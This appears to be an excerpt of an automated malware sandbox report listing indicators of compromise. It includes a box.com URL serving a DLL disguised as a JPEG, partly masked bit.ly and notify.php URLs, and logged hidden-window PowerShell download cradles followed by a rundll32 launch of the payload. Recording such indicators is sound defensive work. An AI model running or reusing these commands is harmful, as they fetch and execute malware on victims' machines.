Technical Information
- https://tecmundocombr.box.com/shared/static/povetz0kmcpq8juy5t7ub2yhcyi8z61f.jpg as %temp%\zfnlahyku_user_msxfe.dll
- http://bi#.ly/2kqgvjr
- http://bi#.ly/2kQGvJr
- http://rf###rasil.com/notify.php
- DNS ASK bi#.ly
- DNS ASK te#####ocombr.box.com
- DNS ASK rf###rasil.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (new-obJect system.net.webcLIent).downLoadfILe('""https://tecmundocombr.box.com/shared/static/povetz0kmcpq8juy5t7ub2yhcyi8z61f.jpg','%TEMP%\zfnlahyku_user_msxfe.dLL');cd $env:TEMP ;start-Proces...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (new-obJect net.webcLIent).downLoadstrIng('http://bi#.ly/2kQGvJr')"' (with hidden window)
- '<SYSTEM32>\rundll32.exe' zfnlahyku_user_msxfe.dLL starter